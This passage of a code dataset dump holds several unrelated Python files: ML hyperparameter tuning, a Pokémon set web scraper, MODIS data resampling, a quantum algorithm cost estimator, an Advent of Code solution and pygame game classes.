plt.xlabel(x)\n plt.ylabel(self.score_name)\n ax.axhline(y=0, color='k')\n if xlim:\n ax.set_xlim([xlim[0],xlim[1]])\n if ylim:\n ax.set_ylim([ylim[0],ylim[1]])\n\n plt.tight_layout()\n if filename is not None:\n fig.savefig(filename + '.pdf')\n\n def train_on_whole_training_set(self, max_epochs=None, delta_percent=None):\n # get the best model conditions from the hyperparameter exploration,\n # and print it to ensure the user's hyperparameters match the best\n # models's.:\n #print(\"best cross-validation model's info:\")\n #print(self.best('summary'))\n print(\"getting best model.\")\n # Reset model, but not the initial weights\n self.final_model = self.best('model').copy(reset=True)\n self.final_model.check_W_bar_fit_during_fitting = True\n self.final_model.assess_test_data_during_fitting =True\n\n print(\"replace X and Y before training on all the data\")\n # replace the smaller training sets with the whole training set.\n self.final_model.replace_X_and_y(self.all_training_X,\n self.all_training_y)\n if max_epochs is not None:\n self.final_model.max_epochs = max_epochs\n if delta_percent is not None:\n self.delta_percent = delta_percent\n\n print(\"fit the final model with all the training data\")\n # find the best weights using all the data\n self.final_model.run()\n assert self.final_model.W_bar is not None, \\\n \"Should have bar{W} for final model, so the test data is \" \\\n \"assessed using bar{W} instead of W.\"\n try:\n self.final_model.plot_loss_and_eta()\n self.final_model.plot_loss_of_both_W_arrays()\n except:\n print(\"not all the plotting worked for the model run with\"\n \"all of the training data\")\n\n print(\"Done training final model with all the training data.\")\n\n def evaluate_test_data(self):\n assert self.final_model.W_bar is not None, \\\n \"Should use bar{W} to evaluate test data\"\n\n test_results = self.final_model.apply_model(\n X=self.test_X, y=self.test_y, data_name=\"test\")\n print(pd.DataFrame(test_results).T)\n\n\n","repo_name":"JanetMatsen/Machine_Learning_CSE_546","sub_path":"HW3/code/hyperparameter_explorer.py","file_name":"hyperparameter_explorer.py","file_ext":"py","file_size_in_byte":10403,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"2025947054","text":"import scrapy\r\nfrom scrapy.loader import ItemLoader\r\nfrom pokemon_cards.items import PokemonSet\r\n\r\n\r\nclass PokemonSetsSpider(scrapy.Spider):\r\n # this spider collects the set name, release date and set abbreviation\r\n name = 'pokemon_sets'\r\n\r\n def start_requests(self):\r\n # This starts the web scraper at the correct website\r\n url = \"https://bulbapedia.bulbagarden.net/wiki/List_of_Pok%C3%A9mon_Trading_Card_Game_expansions\"\r\n yield scrapy.Request(url=url, callback=self.parse_pokemon_sets)\r\n\r\n def parse_pokemon_sets(self, response):\r\n # this collects all set info in the table using xpath and stores them in the item loader\r\n set_name = response.xpath(\"//tr[1]//td[ 4]/a/text()\").getall()\r\n set_date = response.xpath(\"//tr[1]//td[ 8]/text()\").getall()\r\n set_date = [str(d).strip() for d in set_date]\r\n set_abbreviation = response.xpath(\"//tr[1]//td[ 10]/text()\").getall()\r\n set_abbreviation = [str(s).strip() for s in set_abbreviation]\r\n loader = ItemLoader(PokemonSet(), response)\r\n loader.add_value('set_name', set_name)\r\n loader.add_value('set_date', set_date)\r\n loader.add_value('set_abbreviation', set_abbreviation)\r\n yield 
","repo_name":"JonathanWamsley/pokemon_cards_project","sub_path":"data_extracting/pokemon_cards/pokemon_cards/spiders/pokemon_sets_spider.py","file_name":"pokemon_sets_spider.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"11171885184","text":"import os  # needed by os.path.expanduser below\n\nimport xarray as xr\nimport xesmf as xe\nimport numpy as np\nfrom tqdm import tqdm\nfrom datetime import datetime\n\npathOut = \"~/data/MODIS/output\"\npathOut = os.path.expanduser(pathOut)\n\nkeep_vars = [\n    'NDVI',\n    'NIRv',\n    'Nadir_Reflectance_Band1',\n    'Nadir_Reflectance_Band2',\n    'Nadir_Reflectance_Band3',\n    'Nadir_Reflectance_Band4',\n    'Nadir_Reflectance_Band5',\n    'Nadir_Reflectance_Band6',\n    'Nadir_Reflectance_Band7',\n    'crs',\n    'kNDVI'\n]\n\ndates_2000 = np.arange(np.datetime64(\"2000-01-05\"), np.datetime64(\"2000-12-31\"), np.timedelta64(8, \"D\")).astype(\"datetime64[ns]\")\n\ndataset = xr.open_zarr(f\"{pathOut}/modis-mcd43c4-vis-256x256x256.zarr\")\n\ndataset = dataset[keep_vars]\n\nlast_year = 2021\nfirst_year = np.datetime64(dataset.time_coverage_start).astype(\"datetime64[Y]\").astype(str).astype(int)\n\nyears = np.arange(first_year, last_year + 1)\n\ndef resample_weekly(ds, year):\n    keep_attrs = ds.time.attrs\n    ds = ds.sel(time=slice(f\"{year}-01-01\", f\"{year}-12-31\")).resample(time=\"8D\").mean()\n    ds['time'] = ds.time + np.timedelta64(4, \"D\")\n    ds.time.attrs = keep_attrs\n    if year == 2000:\n        ds = ds.interp(coords=dict(time=dates_2000))\n    return ds\n\ndataset_8d = [resample_weekly(dataset, year) for year in tqdm(years)]\ndataset_8d = xr.concat(dataset_8d, dim=\"time\")\n\ndataset_8d['crs'] = dataset['crs']\n\ndataset_8d.attrs['date_modified'] = str(datetime.now())\ndataset_8d.attrs['time_coverage_end'] = str(dataset_8d.time[-1].values)\ndataset_8d.attrs['time_coverage_start'] = str(dataset_8d.time[0].values)\ndataset_8d.attrs['temporal_resolution'] = \"8D\"\ndataset_8d.attrs['time_period'] = \"8D\"\ndataset_8d.attrs['reported_day'] = 5.0\ndataset_8d.attrs['processing_steps'] = dataset_8d.attrs['processing_steps'] + ['resampling by 8-day mean']\n\ndataset_8d = dataset_8d.chunk(dict(time=256, lat=128, lon=128))\ndataset_8d.attrs['id'] = \"256x128x128\"\n\ndataset_8d.to_zarr(f\"{pathOut}/modis-mcd43c4-vis-8d-0.05deg-256x128x128.zarr\")","repo_name":"deepesdl/cube-gen","sub_path":"ESDC/inputs-preprocess/MODIS/modis-mcd43c4-data-cube-8d.py","file_name":"modis-mcd43c4-data-cube-8d.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"27795148895","text":"from animal_generator.models.neuron import Neuron\nfrom animal_generator.models.synapse import Synapse\nfrom animal_generator.services.brain.brain_computer import BrainComputer\n\n\nclass Brain:\n    def __init__(self, animal, raw_neurons, raw_synapses):\n        self.animal = animal\n        self.neurons = self.generate_neurons(raw_neurons)\n        self.synapses = self.generate_synapses(raw_synapses)\n        self.computer = BrainComputer(self)\n        self.clean()\n\n    def clean(self):\n        from animal_generator.services.brain.brain_cleaner import BrainCleaner\n\n        BrainCleaner(self).run()\n\n    def get_neuron_by_id(self, neuron_id):\n        for neuron in self.neurons:\n            if neuron.id == neuron_id:\n                return neuron\n        raise BrainException(f\"Neuron with id: {neuron_id} does not exist\")\n\n    def get_neurons_by_layer(self, layer_number):\n        neurons_at_layer = list(\n            filter(\n                lambda neuron: neuron.layer == 
layer_number,\n self.neurons\n )\n )\n if len(neurons_at_layer) == 0:\n raise BrainException(f\"No neuron at layer: {layer_number}\")\n return neurons_at_layer\n\n def get_synapse_by_output_id(self, output_id):\n synapses_with_output = list(\n filter(\n lambda synapse: synapse.output == output_id,\n self.synapses\n )\n )\n return synapses_with_output\n\n @staticmethod\n def generate_neurons(raw_neurons):\n neurons = []\n for raw_neuron in raw_neurons:\n neurons.append(Neuron(raw_neuron))\n return neurons\n\n @staticmethod\n def generate_synapses(raw_synapses):\n synapses = []\n for raw_synapse in raw_synapses:\n synapses.append(Synapse(raw_synapse))\n return synapses\n\n def reset_scores(self):\n for neuron in self.neurons:\n neuron.reset_score()\n\n def compute(self, other_animal):\n self.computer.compute_brain(other_animal)\n return self.computer.result\n\n\nclass BrainException(Exception):\n \"\"\"All Brain Exceptions\"\"\"\n","repo_name":"NicolleLouis/animal_generator","sub_path":"animal_generator/models/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"63597262","text":"import numpy as np\nfrom scipy.optimize import minimize, NonlinearConstraint\n\nimport trotter_based_methods\nimport taylor_based_methods\nimport plane_waves_methods\nimport qrom_methods\nimport interaction_picture\n\nclass Cost_calculator:\n\n def __init__(self, molecule, tools, molecule_info_type):\n\n self.molecule = molecule\n self.tools = tools\n self.molecule_info_type = molecule_info_type\n self.costs = {'qdrift': [],\n 'rand_ham': [],\n 'taylor_naive': [],\n 'taylor_on_the_fly': [],\n 'configuration_interaction': [],\n 'low_depth_trotter': [],\n 'shc_trotter': [],\n 'low_depth_taylor': [],\n 'low_depth_taylor_on_the_fly': [],\n 'linear_t': [],\n 'sparsity_low_rank': [],\n 'interaction_picture': []\n }\n self.basis = self.tools.config_variables['basis']\n self.runs = self.tools.config_variables['runs']\n self.p_fail = self.tools.config_variables['p_fail']\n\n def calculate_cost(self, method): \n\n if self.molecule_info_type == 'name':\n \n json_name = str(self.molecule.molecule_info)+ '_' + str(self.basis)\n self.molecule.load(json_name = 'parameters/'+json_name+'_'+str(self.tools.config_variables['gauss2plane_overhead']))\n\n if method == 'qdrift' or method == 'rand_ham':\n\n methods_trotter = trotter_based_methods.Trotter_based_methods(self.tools)\n\n # calculate the basis of the molecule (and its parameters)\n if not hasattr(self.molecule, 'lambda_value') or not hasattr(self.molecule, 'Lambda_value') or not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'Gamma'):\n self.molecule.get_basic_parameters()\n\n if method == 'qdrift': \n \n lambda_value = self.molecule.lambda_value\n arguments = (self.p_fail, lambda_value)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_trotter.calc_qdrift_resources, arguments)\n \n \n self.costs['qdrift'] += [methods_trotter.calc_qdrift_resources(\n optimized_errors.x,\n self.p_fail,\n lambda_value)]\n\n elif method == 'rand_ham': \n\n Lambda_value = self.molecule.Lambda_value\n Gamma = self.molecule.Gamma\n\n arguments = (self.p_fail, Lambda_value, Gamma)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, 
methods_trotter.calc_rand_ham_resources, arguments)\n \n self.costs['rand_ham'] += [methods_trotter.calc_rand_ham_resources(\n optimized_errors.x,\n self.p_fail,\n Lambda_value,\n Gamma)]\n \n elif method == 'taylor_naive' or method == 'taylor_on_the_fly' or method == 'configuration_interaction':\n\n methods_taylor = taylor_based_methods.Taylor_based_methods(self.tools)\n\n # calculate the basis of the molecule (and its parameters)\n if not hasattr(self.molecule, 'lambda_value') or not hasattr(self.molecule, 'Lambda_value') or not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'Gamma'):\n self.molecule.get_basic_parameters()\n\n lambda_value = self.molecule.lambda_value\n Lambda_value = self.molecule.Lambda_value\n Gamma = self.molecule.Gamma\n N = self.molecule.N\n\n if method == 'taylor_naive':\n\n arguments = (self.p_fail, lambda_value, Gamma, N)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_taylor.taylor_naive, arguments)\n\n self.costs['taylor_naive'] += [methods_taylor.taylor_naive(\n optimized_errors.x,\n self.p_fail,\n lambda_value,\n Gamma,\n N)]\n\n\n elif method == 'taylor_on_the_fly':\n\n if not hasattr(self.molecule, 'phi_max') or not hasattr(self.molecule, 'dphi_max'):\n self.molecule.molecular_orbital_parameters()\n if not hasattr(self.molecule, 'zeta_max_i'):\n self.molecule.calculate_zeta_max_i()\n\n zeta_max_i = self.molecule.zeta_max_i\n phi_max = self.molecule.phi_max\n dphi_max = self.molecule.dphi_max\n J = len(self.molecule.molecule_geometry) #is the number of atoms in the molecule\n\n arguments = (self.p_fail, N, Gamma, phi_max, dphi_max, zeta_max_i, J)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S, eps_H, eps_taylor\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(5, methods_taylor.taylor_on_the_fly, arguments)\n\n self.costs['taylor_on_the_fly'] += [methods_taylor.taylor_on_the_fly(\n optimized_errors.x,\n self.p_fail,\n N,\n Gamma,\n phi_max,\n dphi_max,\n zeta_max_i,\n J)]\n \n elif method == 'configuration_interaction':\n if not hasattr(self.molecule, 'phi_max') or not hasattr(self.molecule, 'grad_max') or not hasattr(self.molecule, 'lapl_max'):\n self.molecule.molecular_orbital_parameters()\n if not hasattr(self.molecule, 'alpha'):\n self.molecule.min_alpha()\n if not hasattr(self.molecule, 'zeta_max_i'):\n self.molecule.calculate_zeta_max_i()\n\n N = self.molecule.N # computed from initialising the molecule\n x_max = 1 # Default units are Angstroms. 
See https://en.wikipedia.org/wiki/Atomic_radius and https://en.wikipedia.org/wiki/Atomic_radii_of_the_elements_(data_page)\n phi_max = self.molecule.phi_max\n alpha = self.molecule.alpha\n eta = self.molecule.eta\n zeta_max_i = self.molecule.zeta_max_i\n\n gamma1 = self.molecule.grad_max * x_max / self.molecule.phi_max\n gamma2 = self.molecule.lapl_max * x_max**2 / self.molecule.phi_max\n\n J = len(self.molecule.molecule_geometry) #is the number of atoms in the molecule\n\n arguments = (self.p_fail, N, eta, alpha, gamma1, gamma2, zeta_max_i, phi_max, J)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S, eps_H, eps_taylor\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(5, methods_taylor.configuration_interaction, arguments)\n\n # alpha, gamma1, gamma2 are used to calculate K0, K1, K2 (see eq D14 in overleaf)\n self.costs['configuration_interaction'] += [methods_taylor.configuration_interaction(\n optimized_errors.x,\n self.p_fail,\n N,\n eta, \n alpha,\n gamma1,\n gamma2,\n zeta_max_i,\n phi_max,\n J)]\n\n \n elif method == 'low_depth_trotter' or method == 'low_depth_taylor' or method == 'low_depth_taylor_on_the_fly' or method == 'shc_trotter':\n methods_plane_waves = plane_waves_methods.Plane_waves_methods(self.tools)\n\n # This methods are plane waves, so instead of calling self.molecule.get_basic_parameters() one should call self.molecule.build_grid()\n # grid_length is the only parameter of build_grid. Should be calculated such that the number of basis functions\n # is ~= 100*self.molecule_data.n_orbitals. grid_length ~= int(np.cbrt(100*self.molecule.molecule_data.n_orbitals * 2))\n # Omega is returned by self.molecule.build_grid()\n # J = len(self.molecule.geometry) #is the number of atoms in the molecule\n\n if method == 'low_depth_trotter':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'Omega') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n eta = self.molecule.eta\n Omega = self.molecule.Omega\n\n arguments = (self.p_fail, N_grid, eta, Omega)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_plane_waves.low_depth_trotter, arguments)\n\n self.costs['low_depth_trotter'] += [methods_plane_waves.low_depth_trotter(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n eta, \n Omega)]\n\n elif method == 'shc_trotter':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'Omega') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n eta = self.molecule.eta\n Omega = self.molecule.Omega\n\n arguments = (self.p_fail, N_grid, eta, Omega)\n\n # generate values for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_plane_waves.shc_trotter, arguments)\n\n self.costs['shc_trotter'] += [methods_plane_waves.shc_trotter(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n eta, \n Omega)]\n\n elif method == 'low_depth_taylor':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not 
hasattr(self.molecule, 'lambda_value_grid') or not hasattr(self.molecule, 'Lambda_value_grid') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n lambda_value_grid = self.molecule.lambda_value_grid \n H_norm_lambda_ratio = self.tools.config_variables['h_norm_lambda_ratio']\n\n arguments = (self.p_fail, N_grid, lambda_value_grid, H_norm_lambda_ratio)\n\n # generate value for errors epsilon_PEA, epsilon_HS, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_plane_waves.low_depth_taylor, arguments)\n\n self.costs['low_depth_taylor'] += [methods_plane_waves.low_depth_taylor(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n lambda_value_grid, \n H_norm_lambda_ratio)]\n\n elif method == 'low_depth_taylor_on_the_fly':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'lambda_value_grid') or not hasattr(self.molecule, 'Omega') or not hasattr(self.molecule, 'Gamma_grid') or not hasattr(self.molecule, 'eta') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n eta = self.molecule.eta\n Gamma_grid = self.molecule.Gamma_grid \n lambda_value_grid = self.molecule.lambda_value_grid \n Omega = self.molecule.Omega\n \n x_max = self.molecule.xmax\n J = len(self.molecule.molecule_geometry) #is the number of atoms in the molecule\n\n arguments = (self.p_fail, N_grid, eta, Gamma_grid, lambda_value_grid, Omega, J, x_max)\n\n # generate value for errors epsilon_PEA, epsilon_HS, epsilon_S, epsilon_H, epsilon_tay\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(5, methods_plane_waves.low_depth_taylor_on_the_fly, arguments)\n\n # find x_max from cell volume assuming a perfect cube centered on 0\n self.costs['low_depth_taylor_on_the_fly'] += [methods_plane_waves.low_depth_taylor_on_the_fly(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n eta,\n Gamma_grid,\n lambda_value_grid , \n Omega,\n J, \n x_max)]\n\n elif method == 'linear_t' or method == 'sparsity_low_rank':\n\n methods_qrom = qrom_methods.QROM_methods(self.tools)\n\n if method == 'linear_t':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'lambda_value_grid') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n lambda_value_grid = self.molecule.lambda_value_grid\n H_norm_lambda_ratio = self.tools.config_variables['h_norm_lambda_ratio']\n\n arguments = (self.p_fail, N_grid, lambda_value_grid, H_norm_lambda_ratio)\n\n # generate value for errors epsilon_PEA, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(2, methods_qrom.linear_t, arguments)\n \n self.costs['linear_t'] += [methods_qrom.linear_t(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n lambda_value_grid ,\n H_norm_lambda_ratio)]\n\n elif method == 'sparsity_low_rank':\n\n if not hasattr(self.molecule, 'sparsity_d') or not hasattr(self.molecule, 'final_rank') or not hasattr(self.molecule, 'lambda_value_low_rank'):\n self.molecule.low_rank_approximation(sparsify = True)\n\n N = self.molecule.N\n lambda_value = self.molecule.lambda_value_low_rank\n sparsity_d = self.molecule.sparsity_d \n final_rank = self.molecule.final_rank\n H_norm_lambda_ratio = 
self.tools.config_variables['h_norm_lambda_ratio']\n\n arguments = (self.p_fail, N, lambda_value, final_rank, H_norm_lambda_ratio, sparsity_d)\n \n # generate value for errors epsilon_PEA, epsilon_S\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(2, methods_qrom.sparsity_low_rank, arguments)\n\n self.costs['sparsity_low_rank'] += [methods_qrom.sparsity_low_rank(\n optimized_errors.x,\n self.p_fail,\n N, \n lambda_value,\n final_rank, \n H_norm_lambda_ratio,\n sparsity_d)]\n \n elif method == 'interaction_picture' or method == 'sublinear_scaling':\n\n methods_interaction_picture = interaction_picture.Interaction_picture(self.tools)\n\n if method == 'interaction_picture':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n \n if not hasattr(self.molecule, 'lambda_value_T') or not hasattr(self.molecule, 'lambda_value_U_V') or not hasattr(self.molecule, 'Gamma_grid') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n self.molecule.lambda_of_Hamiltonian_terms_2nd(grid)\n\n lambda_value_T = self.molecule.lambda_value_T \n lambda_value_U_V = self.molecule.lambda_value_U_V\n\n N_grid = self.molecule.N_grid\n Gamma_grid = self.molecule.Gamma_grid \n\n arguments = (self.p_fail, N_grid, Gamma_grid, lambda_value_T, lambda_value_U_V)\n\n # generate value for errors epsilon_S, epsilon_HS, epsilon_PEA\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(3, methods_interaction_picture.interaction_picture, arguments)\n\n self.costs['interaction_picture'] += [methods_interaction_picture.interaction_picture(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n Gamma_grid, \n lambda_value_T, \n lambda_value_U_V)]\n \n \n # TO BE DELETED\n elif method == 'sublinear_scaling':\n\n grid_length = int(round((self.molecule.N * self.tools.config_variables['gauss2plane_overhead']) ** (1/3)))\n if not hasattr(self.molecule, 'lambda_value_T') or not hasattr(self.molecule, 'lambda_value_U_V') or not hasattr(self.molecule, 'Gamma_grid') or not hasattr(self.molecule, 'N_grid'):\n grid = self.molecule.build_grid(grid_length)\n\n N_grid = self.molecule.N_grid\n eta = self.molecule.eta\n Gamma_grid = self.molecule.Gamma_grid \n Omega = self.molecule.Omega\n \n\n J = len(self.molecule.molecule_geometry) #is the number of atoms in the molecule\n\n Omega = self.molecule.Omega\n self.molecule.lambda_of_Hamiltonian_terms_1st(eta, Omega, N_grid)\n lambda_value_T, lambda_value_U_V = self.molecule.lambda_value_T, self.molecule.lambda_value_U_V\n\n arguments = (self.p_fail, N_grid, eta, Gamma_grid , lambda_value_T, lambda_value_U_V, J)\n\n # generate value for errors epsilon_S, epsilon_HS, epsilon_PEA, epsilon_mu, epsilon_M_0, epsilon_R\n for _ in range(self.runs):\n optimized_errors = self.calculate_optimized_errors(6, methods_interaction_picture.sublinear_scaling_interaction, arguments)\n\n self.costs['sublinear_scaling'] += [methods_interaction_picture.sublinear_scaling_interaction(\n optimized_errors.x,\n self.p_fail,\n N_grid, \n eta, \n Gamma_grid, \n lambda_value_T, \n lambda_value_U_V,\n J)]\n\n else:\n print('<*> ERROR: method', method, 'not implemented or not existing')\n\n if self.molecule_info_type == 'name' and self.molecule.has_data:\n json_name = str(self.molecule.molecule_info)+ '_' + str(self.basis)\n self.molecule.save(json_name = 'parameters/'+json_name+'_'+str(self.tools.config_variables['gauss2plane_overhead']))\n\n def calculate_optimized_errors(self, 
number_errors, cost_method, arguments):\n\n        constraints = self.tools.generate_constraints(number_errors)\n        initial_values = self.tools.generate_initial_error_values(number_errors)\n\n        optimized_errors = minimize(\n            fun=cost_method,\n            x0=initial_values,\n            method=self.tools.config_variables['optimization_method'],\n            constraints=constraints,\n            args=arguments,\n        )\n\n        return optimized_errors\n\n\n    def calculate_time(self, T_gates, p_fail = 1e-1, p_surface_step = 1e-3, P_inject = 5e-3, P_threshold = 5.7e-3, t_cycle = 2e-7, AAA_factories = 1e3):\n        '''\n        DEPRECATED: use https://github.com/quantumlib/OpenFermion/blob/master/src/openfermion/resource_estimates/surface_code_compilation/physical_costing.py \n\n        Calculates the time required to synthesise the T_gates.\n        Based on Appendix M from PHYSICAL REVIEW A 86, 032324 (2012); \"Surface codes: Towards practical large-scale quantum computation\" by Austin G. Fowler\n\n        Arguments:\n        T_gates: int; the number of T gates that we have to synthesise\n        p_fail: float; the probability of failure.\n        p_surface_step: float; the per-step error rate of the surface code\n        P_inject: float; the failure probability in injected states\n        P_threshold: float; the surface code failure probability\n        t_cycle: float; the time of one cycle of the surface code\n        AAA_factories: float; the number of AAA factories available working in parallel\n\n        Returns:\n        time: float; the time (seconds) required to synthesise the T_gates\n        '''\n\n        raise Warning('This function is deprecated: check https://quantum-journal.org/papers/q-2019-04-30-135/ and OpenFermion costing module https://github.com/quantumlib/OpenFermion/blob/master/src/openfermion/resource_estimates/surface_code_compilation/physical_costing.py')\n\n        # NOTE: everything below is unreachable because of the raise above; kept for reference.\n        P_A = p_fail/T_gates\n\n        p_list = [P_inject]\n        assert 35 * P_inject**3 < 1\n        while p_list[-1] < P_A:\n            p = 35*p_list[-1]**3\n            p_list.append(p)\n\n        def distance_2_error(distance, ord):\n            de = np.floor((int(distance)+1)/2)\n            PL = 3e-2*(p_surface_step/P_threshold)**de\n            p_i = 15**ord*16*3*2*1.25*distance*PL\n            return p_i\n\n        vfunc = np.vectorize(distance_2_error)\n\n        constraints = NonlinearConstraint(fun = lambda distances: vfunc(distances, list(range(len(p_list)))), lb = -np.inf, ub = p_list)\n\n        x0 = [17]\n        for i in range(len(p_list)-1):\n            x0.append(x0[-1]*2)\n\n        res = minimize(fun = lambda distances: distances.sum(), x0 = x0, method = 'SLSQP', constraints = constraints)\n        distances = res.x\n\n        distances = [int(d) for d in distances]\n\n        code_cycles = 8*1.25*sum(distances)\n\n        time = code_cycles*t_cycle*T_gates/AAA_factories\n\n        return time\n","repo_name":"PabloAMC/TFermion","sub_path":"cost_calculator.py","file_name":"cost_calculator.py","file_ext":"py","file_size_in_byte":23428,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"}
+{"seq_id":"36402037917","text":"data = [x.split('\\n') for x in open('6.txt').read().split('\\n\\n')]\n\ntotal = 0\n\nfor group in data:\n    a = {l:0 for l in 'abcdefghijklmnopqrstuvwxyz'}\n    for person in group:\n        for ans in person:\n            a[ans] += 1\n\n    total += len([x for x, y in a.items() if y == len(group)])\n\nprint(total)\n","repo_name":"MaximeGoyette/adventOfCode2020","sub_path":"6-2.py","file_name":"6-2.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"23380476987","text":"import pygame\nfrom support import import_folder\n\n\nclass Tile(pygame.sprite.Sprite):\n    def __init__(self, size, x, y):\n        super(Tile, self).__init__()\n        self.image = pygame.Surface((size, size))  # tile size\n        
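# keep a rect for positioning and collisions; level code scrolls tiles via this rect\n        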
self.rect = self.image.get_rect(topleft=(x, y))\n\n    def update(self, x_shift):\n        self.rect.x += x_shift  # horizontal map scroll\n\n\nclass StaticTile(Tile):\n    def __init__(self, size, surface, x, y):\n        super(StaticTile, self).__init__(size, x, y)\n        self.image = surface\n\n\nclass Crate(StaticTile):\n    def __init__(self, size, x, y):\n        super().__init__(size, pygame.image.load('../graphics/terrain/crate.png').convert_alpha(), x, y)\n        offset_y = y + size\n        self.rect = self.image.get_rect(bottomleft=(x, offset_y))\n\n\nclass AnimationTile(Tile):\n    def __init__(self, size, x, y, path):\n        super(AnimationTile, self).__init__(size, x, y)\n        self.frames = import_folder(path)\n        self.frames_index = 0\n        self.animation_speed = 0.15\n        self.image = self.frames[self.frames_index]\n\n    def animation(self):\n        self.frames_index += self.animation_speed\n        if self.frames_index >= len(self.frames):\n            self.frames_index = 0\n        self.image = self.frames[int(self.frames_index)]\n\n    def update(self, x_shift):\n        self.animation()\n        self.rect.x += x_shift\n\n\nclass Coins(AnimationTile):\n    def __init__(self, size, x, y, path, value):\n        super(Coins, self).__init__(size, x, y, path)\n        offset_x = x + (size / 2)\n        offset_y = y + (size / 2)\n        self.rect = self.image.get_rect(center=(offset_x, offset_y))\n        self.value = value\n\n\nclass Plams(AnimationTile):\n    def __init__(self, size, x, y, path):\n        super(Plams, self).__init__(size, x, y, path)\n        offset_y = y + size\n        self.rect = self.image.get_rect(bottomleft=(x, offset_y))\n        plams_leaf = (self.rect.width, 58)\n        self.rect = pygame.Rect(self.rect.topleft, plams_leaf)","repo_name":"idloneal/pygame","sub_path":"平台跳跃/code/tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"2545668333","text":"import pygame\nfrom controlador_comida_v3 import *\n\n\n# The Person class, which carries the finite state machine inside itself\nclass Person:\n    choque = False\n    mutacion = 0.15\n    Estados = (\"Nace\", \"Camina\", \"Come\", \"Busca_comida\",\n               \"Ataca\", \"Reproduce\", \"Busca_pareja\", \"Muere\")\n    currentEstado = Estados[0]\n\n    def cargar_datos(self, _adn=None):\n        if _adn is None:\n            self.velocidad = random.uniform(3, 5)\n            self.color = colors.Colors[random.randint(1, len(colors.Colors) - 2)]\n            self.radio = 5 + random.uniform(-2, 2)\n            self.energia_max = 150 + random.uniform(-50, 50)\n            self.best_max = 300 + random.uniform(-100, 100)\n            self.distance_search_partner_max = 300 + random.uniform(-100, 100)\n        else:\n            self.velocidad = _adn[0]\n            self.color = _adn[1]\n            self.radio = _adn[2]\n            self.energia_max = _adn[3]\n            self.best_max = _adn[4]\n            self.distance_search_partner_max = _adn[5]\n        self.energia = float(self.energia_max)\n        self.best = float(self.best_max)\n        self.distance_search_partner = float(self.distance_search_partner_max)\n        self.currentEstado = self.Estados[1]\n\n    def __init__(self, px, py, _lista_comidas, _lista_agentes, _adn=None):\n        self.is_ded = False\n        self.posicion = pygame.Vector2(px, py)\n        self.cargar_datos(_adn)\n        self.score = 0\n        self.my_fud = None\n        self.my_partner = None\n        self.willing = None\n        self.id_comida = int\n        self.lista_comidas = 